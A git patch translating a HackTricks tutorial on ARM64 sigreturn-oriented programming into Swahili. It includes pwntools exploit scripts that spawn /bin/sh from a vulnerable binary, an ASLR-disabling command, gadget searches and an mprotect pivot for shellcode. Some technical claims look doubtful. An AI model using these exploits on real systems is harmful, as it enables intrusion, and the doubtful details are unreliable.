From 15dfd0bd8104d21752e469d53f2a138818c7a86e Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 19 Aug 2025 20:16:29 +0000 Subject: [PATCH] Translated ['src/binary-exploitation/rop-return-oriented-programing/srop --- .../srop-arm64.md | 67 ++++++++++++++++--- 1 file changed, 58 insertions(+), 9 deletions(-) diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index 7ab6869f1..a689e9fc0 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -1,10 +1,10 @@ -# SROP - ARM64 +# {{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}} ## Mfano wa Pwntools -Mfano huu unaunda binary yenye udhaifu na kuifanya. Binary **inasoma kwenye stack** kisha inaita **`sigreturn`**: +Mfano huu unaunda binary iliyo hatarini na kuifanya. Binary **inasoma kwenye stack** kisha inaita **`sigreturn`**: ```python from pwn import * @@ -32,7 +32,7 @@ p = process(binary.path) p.send(bytes(frame)) p.interactive() ``` -## mfano wa bof +## bof mfano ### Msimbo ```c @@ -67,7 +67,7 @@ do_stuff(2); return 0; } ``` -Kusanya na: +Tunga kwa: ```bash clang -o srop srop.c -fno-stack-protector echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR @@ -87,7 +87,7 @@ binsh = next(libc.search(b"/bin/sh")) stack_offset = 72 sigreturn = 0x00000000004006e0 # Call to sig -svc_call = 0x00000000004006e4 # svc #0x0 +svc_call = 0x00000000004006e4 # svc #0x0 frame = SigreturnFrame() frame.x8 = 0xdd # syscall number for execve @@ -103,9 +103,9 @@ payload += bytes(frame) p.sendline(payload) p.interactive() ``` -## mfano wa bof bila sigreturn +## bof mfano bila sigreturn -### Msimbo +### Code ```c #include #include @@ -149,7 +149,7 @@ binsh = next(libc.search(b"/bin/sh")) stack_offset = 72 sigreturn = 0x00000000004006e0 # Call to sig -svc_call = 0x00000000004006e4 # svc #0x0 +svc_call = 0x00000000004006e4 # svc #0x0 frame = SigreturnFrame() frame.x8 = 0xdd # syscall number for execve @@ -171,10 +171,59 @@ Kwa maelezo zaidi kuhusu vdso angalia: ../ret2vdso.md {{#endref}} -Na ili kupita anwani ya `/bin/sh` unaweza kuunda mabadiliko kadhaa ya mazingira yanayolenga hiyo, kwa maelezo zaidi: +Na ili kupita anwani ya `/bin/sh` unaweza kuunda mabadiliko kadhaa ya mazingira yanayorejelea hiyo, kwa maelezo zaidi: {{#ref}} ../../common-binary-protections-and-bypasses/aslr/ {{#endref}} +--- + +## Kutafuta vifaa vya `sigreturn` kiotomatiki (2023-2025) + +Katika usambazaji wa kisasa, trampoline ya `sigreturn` bado inatolewa na ukurasa wa **vDSO** lakini offset halisi inaweza kutofautiana kati ya toleo la kernel na bendera za ujenzi kama BTI (`+branch-protection`) au PAC. Kuwezesha kugundua kwake kunazuia kuweka offsets kwa nguvu: +```bash +# With ROPgadget ≥ 7.4 +python3 -m ROPGadget --binary /proc/$(pgrep srop)/mem --only "svc #0" 2>/dev/null | grep -i sigreturn + +# With rp++ ≥ 1.0.9 (arm64 support) +rp++ -f ./binary --unique -r | grep "mov\s\+x8, #0x8b" # 0x8b = __NR_rt_sigreturn +``` +Zana zote mbili zinaelewa **AArch64** encodings na zitaorodhesha mguso wa `mov x8, 0x8b ; svc #0` ambao unaweza kutumika kama *SROP gadget*. + +> Kumbuka: Wakati binaries zinapoundwa na **BTI**, amri ya kwanza ya kila lengo la tawi la moja kwa moja halali ni `bti c`. `sigreturn` trampolines zilizowekwa na linker tayari zinajumuisha pad ya BTI sahihi hivyo gadget inabaki kutumika kutoka kwa msimbo usio na mamlaka. + +## Kuunganisha SROP na ROP (pivot kupitia `mprotect`) + +`rt_sigreturn` inatupa udhibiti wa *mifumo yote* ya usajili wa jumla na `pstate`. Mwelekeo wa kawaida kwenye x86 ni: 1) tumia SROP kuita `mprotect`, 2) pivot kwa stack mpya inayoweza kutekelezwa yenye shell-code. Wazo sawa kabisa linafanya kazi kwenye ARM64: +```python +frame = SigreturnFrame() +frame.x8 = constants.SYS_mprotect # 226 +frame.x0 = 0x400000 # page-aligned stack address +frame.x1 = 0x2000 # size +frame.x2 = 7 # PROT_READ|PROT_WRITE|PROT_EXEC +frame.sp = 0x400000 + 0x100 # new pivot +frame.pc = svc_call # will re-enter kernel +``` +Baada ya kutuma fremu unaweza kutuma hatua ya pili inayojumuisha shell-code safi kwenye `0x400000+0x100`. Kwa sababu **AArch64** inatumia *PC-relative* anwani hii mara nyingi ni rahisi zaidi kuliko kujenga minyororo mikubwa ya ROP. + +## Uthibitishaji wa Kernel, PAC & Shadow-Stacks + +Linux 5.16 ilianzisha uthibitishaji mkali wa fremu za ishara za watumiaji (commit `36f5a6c73096`). Kernel sasa inakagua: + +* `uc_flags` lazima iwe na `UC_FP_XSTATE` wakati `extra_context` inapatikana. +* Neno lililotengwa katika `struct rt_sigframe` lazima liwe sifuri. +* Kila kiashiria katika rekodi ya *extra_context* kimepangwa na kinaelekeza ndani ya nafasi ya anwani ya mtumiaji. + +`pwntools>=4.10` inaunda fremu zinazokidhi vigezo kiotomatiki, lakini ikiwa unazijenga kwa mikono hakikisha kuanzisha *reserved* kuwa sifuri na uondoe rekodi ya SVE isipokuwa unahitaji kweli—venginevyo `rt_sigreturn` itatoa `SIGSEGV` badala ya kurudi. + +Kuanza na Android 14 na Fedora 38, userland inajengwa na **PAC** (*Pointer Authentication*) na **BTI** imewezeshwa kwa default (`-mbranch-protection=standard`). *SROP* yenyewe haijaathiriwa kwa sababu kernel inabadilisha `PC` moja kwa moja kutoka kwa fremu iliyoundwa, ikipita LR iliyothibitishwa iliyohifadhiwa kwenye stack; hata hivyo, **minyororo yoyote ya ROP inayofuata** inayofanya matawi yasiyo ya moja kwa moja lazima iruke kwenye maagizo yaliyo na BTI au anwani za PAC. Kumbuka hilo unapochagua gadgets. + +Shadow-Call-Stacks zilizoanzishwa katika ARMv8.9 (na tayari zimewezeshwa kwenye ChromeOS 1.27+) ni hatua ya kupunguza kiwango cha kompyuta na *hazihusiani* na SROP kwa sababu hakuna maagizo ya kurudi yanayotekelezwa—mwelekeo wa udhibiti unahamishwa na kernel. + +## Marejeleo + +* [Linux arm64 signal handling documentation](https://docs.kernel.org/arch/arm64/signal.html) +* [LWN – "AArch64 branch protection comes to GCC and glibc" (2023)](https://lwn.net/Articles/915041/) + {{#include ../../../banners/hacktricks-training.md}}